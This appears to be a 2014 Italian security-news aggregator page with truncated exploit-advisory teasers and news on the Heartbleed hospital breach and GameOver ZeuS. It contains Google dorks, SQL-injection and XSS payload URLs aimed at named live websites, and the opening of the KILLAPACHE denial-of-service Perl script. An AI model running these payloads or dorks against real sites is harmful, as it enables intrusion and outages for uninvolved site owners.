ArticleFR 3.0.4 SQL Injection

20 agosto 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23225
Product: ArticleFR
Vendor: Free Reprintables
Vulnerable Version(s): 3.0.4 and probably prior
Tested Version: 3.0.4
Advisory Publication:  July 23, 2014  [without technical details]
Vendor Notification: July 23, 2014 
Public Disclosure: August 20, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-5097
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered...

Leggi il seguito »

WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 agosto 2014 - Fonte: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

Leggi il seguito »

US hospital hack ‘exploited Heartbleed flaw’

20 agosto 2014 - Fonte: http://www.mondounix.com

Heartbleed US HOSPITAL HACK

The theft of personal data belonging to about 4.5 million healthcare patients earlier this year was made possible because of the Heartbleed bug, according to a leading security expert.

Community Health Systems - the US's second largest profit-making hospital chain - announced on Monday that its systems had been breached.

The head of TrustedSec - a cybersecurity firm - now alleges that the encryption flaw was exploited.

CHS has yet to respond to the claim.

The Heartbleed bug made headlines in April when Google and Codenomicon - a Finnish security company - revealed a problem with OpenSSL, a cryptographic library used to digitally scramble sensitive data.

OpenSSL...

Leggi il seguito »

LY Website CMS SQL Injection

18 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: LY Website CMS Sql Injection vulnerability
[+] Date: 2014-08-15
[+] Author: Iran Security Group
[+] Vendor Homepage: http://www.lywebsite.com/
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files: /pro.php
[+} Dork : inurl:/pro.php?CateId=
           intext:"Power By LY Website"
### POC: http://site/pro.php?CateId=[sqli]
### Demo: http://www.bypipefittings.com/pro.php?CateId=20%27
          http://www.top1rc.com/pro.php?CateId=150%27
### Credits:
[+] Special Thanks: Root SmasheR, Hekt0r, Mr.Moein,Umpire, ALIREZA_PROMIS
                    Social Engineer, Ali Ahmady, Saeed.Jok3r,M4hdi
                    Vahid Hacker, BlackErroR, Phantom.S3c
                    And All members of Iran Security Group
[+]...

Leggi il seguito »

WordPress 2.77 CSRF

17 agosto 2014 - Fonte: http://www.mondounix.com
Disqus for Wordpress
https://wordpress.org/plugins/disqus-comment-system
Version affected: up to v2.77
 
CSRF allows for activation and deactivation of the plugin and syncing comments between Disqus servers and the WP 
database.
They supposedly just fixed the CSRF issues. Ugh. Sorry Nik. Even when you tell them about nonces they still don't get 
it right.
 
More details can be found here:
https://vexatioustendencies.com/csrf-in-disqus-wordpress-plugin-v2-77/

(5)

...

Leggi il seguito »

KILLAPACHE Apache httpd Remote Denial of Service

17 agosto 2014 - Fonte: http://www.mondounix.com
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
 
use IO::Socket;
use Parallel::ForkManager;
 
    sub usage {
            print "Apache Remote Denial of Service (memory exhaustion)\n";
            print "by Kingcope\n";
            print "usage: perl killapache.pl <host> [numforks]\n";
            print "example: perl killapache.pl www.example.com 50\n";
    }
 
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
 
    $pm = new...

Leggi il seguito »

GameOver ZeuS zombie MUTATES, shuffles back to its feet

16 agosto 2014 - Fonte: http://www.mondounix.com

GAMEOVER ZEUS ZOMBIE

The resurfaced GameOver bot is back with a vengeance, having infected 12,000 computers after the network was taken down in June, according to Arbor Networks.

The bot was taken out in June in a coordinated and high-profile crackdown by security companies and the FBI and Europol. Servers and domains were seized, disrupting both GameOver Zeus and the CryptoLocker distribution network – although it later staggered back from the dead.

Researchers Dave Loftus and Dennis Schwarz found the bot, now reborn as newGOZ, had ramped up its defences, dumping command and control for a more robust domain generation algorithm (DGA) and a fast flux DNS technique.

The DGA registered new domains...

Leggi il seguito »

WordPress MyBand Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

Leggi il seguito »

WordPress Gamespeed Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

Leggi il seguito »

WordPress SI CAPTCHA Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross  
site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork:  
inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

Leggi il seguito »